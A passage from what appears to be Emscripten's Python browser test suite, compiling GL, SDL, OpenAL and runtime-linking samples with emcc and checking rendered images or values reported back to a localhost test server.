Popen([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename]).communicate()
chunkSize = 1024
data = os.urandom(10*chunkSize+1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data)
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True,chunkSize,data,checksum,self.test_port))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
def test_glgears(self):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(30, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut'] + (['--proxy-to-worker'] if proxy else []), timeout=30)
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING=1', '-lGL', '-lglut',
'--shell-file', path_from_root('tests', 'hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []),
).communicate()
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
def test_fulles2_sdlproc(self):
self.btest('full_es2_sdlproc.c', '1', args=['-s', 'GL_TESTING=1', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2=1', '-lGL', '-lSDL', '-lglut'])
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
with open('something.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
def test_glbook(self):
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.bc'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.bc'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.bc'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.bc'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.bc'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.bc'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.bc'),
], configure=None)
def book_path(*pathelems):
return path_from_root('tests', 'glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.bc':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), os.path.join(self.get_dir(), 'basemap.tga'))
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), os.path.join(self.get_dir(), 'lightmap.tga'))
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.bc':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), os.path.join(self.get_dir(), 'smoke.tga'))
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.bc', '.png')), args=args, timeout=30)
def test_gles2_emulation(self):
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), self.in_dir('basemap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), self.in_dir('lightmap.tga'))
shutil.copyfile(path_from_root('tests', 'glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), self.in_dir('smoke.tga'))
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), path_from_root('tests', 'glbook', 'CH02_HelloTriangle.png')),
#(os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), path_from_root('tests', 'glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureWrap.png')),
#(os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), path_from_root('tests', 'glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), path_from_root('tests', 'glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), path_from_root('tests', 'glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), path_from_root('tests', 'glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + path_from_root('tests', 'glbook', 'Common'),
path_from_root('tests', 'glbook', 'Common', 'esUtil.c'),
path_from_root('tests', 'glbook', 'Common', 'esShader.c'),
path_from_root('tests', 'glbook', 'Common', 'esShapes.c'),
path_from_root('tests', 'glbook', 'Common', 'esTransform.c'),
'-s', 'FULL_ES2=1', '-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'])
def test_emscripten_api(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_api_browser.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_third']''', '-lSDL'])
def test_emscripten_api2(self):
def setup():
open('script1.js', 'w').write('''
Module._set(456);
''')
open('file1.txt', 'w').write('first');
open('file2.txt', 'w').write('second');
setup()
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
# check using file packager to another dir
self.clear()
setup()
os.mkdir('sub')
Popen([PYTHON, FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w')).communicate()
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', '''EXPORTED_FUNCTIONS=['_main', '_set']''', '-s', 'FORCE_FILESYSTEM=1'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png')) # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'NO_EXIT_RUNTIME=0']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
def test_emscripten_main_loop_settimeout(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
def test_gl_textures(self):
self.btest('gl_textures.cpp', '0', args=['-lGL'])
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
def test_gl_ps_strides(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
def test_gl_ps_worker(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], reference_slack=1)
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS=1', '-lGL', '-lSDL'], expected=['1'])
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328'], args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_pre(self):
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
self.btest('cubegeom_pre.c', reference='cubegeom_pre.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'RELOCATABLE=1'])
def test_cubegeom_pre2(self):
self.btest('cubegeom_pre2.c', reference='cubegeom_pre2.png', args=['-s', 'GL_DEBUG=1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
def test_cubegeom_pre3(self):
self.btest('cubegeom_pre3.c', reference='cubegeom_pre2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom(self):
self.btest('cubegeom.c', reference='cubegeom.png', args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
def test_cubegeom_proc(self):
open('side.c', 'w').write(r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os', '-s', 'WASM=1']]:
self.btest('cubegeom_proc.c', reference='cubegeom.png', args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_glew(self):
self.btest('cubegeom_glew.c', reference='cubegeom.png', args=['-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lGLEW', '-lSDL'])
def test_cubegeom_color(self):
self.btest('cubegeom_color.c', reference='cubegeom_color.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_normal(self):
self.btest('cubegeom_normal.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest('cubegeom_normal_dap.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest('cubegeom_normal_dap_far.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest('cubegeom_normal_dap_far_range.c', reference='cubegeom_normal.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest('cubegeom_normal_dap_far_glda.c', reference='cubegeom_normal_dap_far_glda.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest('cubegeom_normal_dap_far_glda_quad.c', reference='cubegeom_normal_dap_far_glda_quad.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_mt(self):
self.btest('cubegeom_mt.c', reference='cubegeom_mt.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL']) # multitexture
def test_cubegeom_color2(self):
self.btest('cubegeom_color2.c', reference='cubegeom_color2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
def test_cubegeom_texturematrix(self):
self.btest('cubegeom_texturematrix.c', reference='cubegeom_texturematrix.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_fog(self):
self.btest('cubegeom_fog.c', reference='cubegeom_fog.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_pre_vao(self):
self.btest('cubegeom_pre_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_pre2_vao(self):
self.btest('cubegeom_pre2_vao.c', reference='cubegeom_pre_vao.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_pre2_vao2(self):
self.btest('cubegeom_pre2_vao2.c', reference='cubegeom_pre2_vao2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_cubegeom_pre_vao_es(self):
self.btest('cubegeom_pre_vao_es.c', reference='cubegeom_pre_vao.png', args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
def test_cubegeom_u4fv_2(self):
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
self.btest('cubegeom_u4fv_2.c', reference='cubegeom_u4fv_2.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-s', 'SPLIT_MEMORY=16777216']) # check for uniform4fv slice being valid in split memory
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], also_proxied=True)
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'TOTAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
def test_glbegin_points(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '--use-preload-plugins'])
def test_s3tc(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_s3tc_ffp_only(self):
shutil.copyfile(path_from_root('tests', 'screenshot.dds'), os.path.join(self.get_dir(), 'screenshot.dds'))
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION=1', '-s', 'GL_FFP_ONLY=1', '-lGL', '-lSDL'])
def test_s3tc_crunch(self):
try:
print('Crunch is located at ' + CRUNCH)
except:
return self.skip('Skipped: Crunch is not present on the current system. Please install it (manually or via emsdk) and make sure it is activated in the Emscripten configuration file.')
def test(args):
print(args)
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
open('text.txt', 'w').write('123')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds', 'water.dds'] + args, stdout=open('pre.js', 'w')).communicate()
assert os.stat('test.data').st_size < 0.5*(os.stat('ship.dds').st_size+os.stat('bloom.dds').st_size+os.stat('water.dds').st_size), 'Compressed should be smaller than dds'
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'pre.js', '-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
test([])
test(['text.txt']) # also package a non-crunch file
def test_s3tc_crunch_split(self): # load several datafiles/outputs of file packager
try:
print('Crunch is located at ' + CRUNCH)
except:
return self.skip('Skipped: Crunch is not present on the current system. Please install it (manually or via emsdk) and make sure it is activated in the Emscripten configuration file.')
shutil.copyfile(path_from_root('tests', 'ship.dds'), 'ship.dds')
shutil.copyfile(path_from_root('tests', 'bloom.dds'), 'bloom.dds')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
Popen([PYTHON, FILE_PACKAGER, 'asset_a.data', '--crunch', '--preload', 'ship.dds', 'bloom.dds'], stdout=open('asset_a.js', 'w')).communicate()
Popen([PYTHON, FILE_PACKAGER, 'asset_b.data', '--crunch', '--preload', 'water.dds'], stdout=open('asset_b.js', 'w')).communicate()
shutil.move('ship.dds', 'ship.donotfindme.dds') # make sure we load from the compressed
shutil.move('bloom.dds', 'bloom.donotfindme.dds') # make sure we load from the compressed
shutil.move('water.dds', 'water.donotfindme.dds') # make sure we load from the compressed
self.btest('s3tc_crunch.c', reference='s3tc_crunch.png', reference_slack=11, args=['--pre-js', 'asset_a.js', '--pre-js', 'asset_b.js', '-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_aniso(self):
if SPIDERMONKEY_ENGINE in JS_ENGINES:
# asm.js-ification check
Popen([PYTHON, EMCC, path_from_root('tests', 'aniso.c'), '-O2', '-g2', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types']).communicate()
Settings.ASM_JS = 1
self.run_generated_code(SPIDERMONKEY_ENGINE, 'a.out.js', assert_returncode=None)
print('passed asm test')
shutil.copyfile(path_from_root('tests', 'water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL', '-lSDL'])
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lGL'])
def test_openal_error(self):
for args in [[], ['--closure', '1']]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
main, supp = self.setup_runtimelink_test()
open('supp.cpp', 'w').write(supp)
Popen([PYTHON, EMCC, 'supp.cpp', '-o', 'supp.js', '-s', 'SIDE_MODULE=1', '-O2']).communicate()
self.btest(main, args=['-DBROWSER=1', '-s', 'MAIN_MODULE=1', '-O2', '-s', 'RUNTIME_LINKED_LIBS=["supp.js"]'], expected='76')
def test_pre_run_deps(self):
# Adding a dependency in preRun will delay run
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency();
Module.print('preRun called, added a dependency...');
setTimeout(function() {
Module.okk = 10;
removeRunDependency()
}, 2000);
};
''')
for mem in [0, 1]:
self.btest('pre_run_deps.cpp', expected='10', args=['--pre-js', 'pre.js', '--memory-init-file', str(mem)])
def test_mem_init(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function myJSCallback() { // called from main()
Module._note(1);
}
Module.preRun = function() {
addOnPreMain(function() {
Module._note(2);
});
};
''')
open(os.path.join(self.get_dir(), 'post.js'), 'w').write('''
var assert = function(check, text) {
if (!check) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?9');
xhr.onload = function() {
window.close();
};
xhr.send();
}
}
Module._note(4); // this happens too early! and is overwritten when the mem init arrives
''' % self.test_port)
# with assertions, we notice when memory was written to too early
self.btest('mem_init.cpp', expected='9', args=['--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1'])
# otherwise, we just overwrite
self.btest('mem_init.cpp', expected='3', args=['--pre-js', 'pre.js', '--post-js', 'post.js', '--memory-init-file', '1', '-s', 'ASSERTIONS=0'])
def test_mem_init_request(self):
def test(what, status):
print(what, status)
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var xhr = Module.memoryInitializerRequest = new XMLHttpRequest();
xhr.open('GET', "''' + what + '''", true);
xhr.responseType = 'arraybuffer';
xhr.send(null);
console.warn = function(x) {
if (x.indexOf('a problem seems to have happened with Module.memoryInitializerRequest') >= 0) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?0');
setTimeout(xhr.onload = function() {
console.log('close!');
window.close();
}, 1000);
xhr.send();
throw 'halt';
}
console.log('WARNING: ' + x);
};
''' % self.test_port)
self.btest('mem_init_request.cpp', expected=status, args=['--pre-js', 'pre.js', '--memory-init-file', '1'])
test('test.html.mem', '1')
test('nothing.nowhere', '0')
def test_runtime_misuse(self):
post_prep = '''
var expected_ok = false;
function doCcall(n) {
ccall('note', 'string', ['number'], [n]);
}
var wrapped = cwrap('note', 'string', ['number']); // returns a string to suppress cwrap optimization
function doCwrapCall(n) {
var str = wrapped(n);
Module.print('got ' + str);
assert(str === 'silly-string');
}
function doDirectCall(n) {
Module['_note'](n);
}
'''
post_test = '''
var ok = false;
try {
doCcall(1);
ok = true; // should fail and not reach here, runtime is not ready yet so ccall will abort
} catch(e) {
Module.print('expected fail 1');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doCwrapCall(2);
ok = true; // should fail and not reach here, runtime is not ready yet so cwrap call will abort
} catch(e) {
Module.print('expected fail 2');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
ok = false;
try {
doDirectCall(3);
ok = true; // should fail and not reach here, runtime is not ready yet so any code execution
} catch(e) {
Module.print('expected fail 3');
assert(e.toString().indexOf('assert') >= 0); // assertion, not something else
ABORT = false; // hackish
}
assert(ok === expected_ok);
'''
post_hook = r'''
function myJSCallback() {
// called from main, this is an ok time
doCcall(100);
doCwrapCall(200);
doDirectCall(300);
}
setTimeout(function() {
var xhr = new XMLHttpRequest();
assert(Module.noted);
xhr.open('GET', 'http://localhost:%s/report_result?' + HEAP32[Module.noted>>2]);
xhr.send();
setTimeout(function() { window.close() }, 1000);
}, 1000);
''' % self.test_port
open('pre_runtime.js', 'w').write(r'''
Module.onRuntimeInitialized = function(){
myJSCallback();
};
''')
for filename, extra_args, second_code in [
('runtime_misuse.cpp', [], 600),
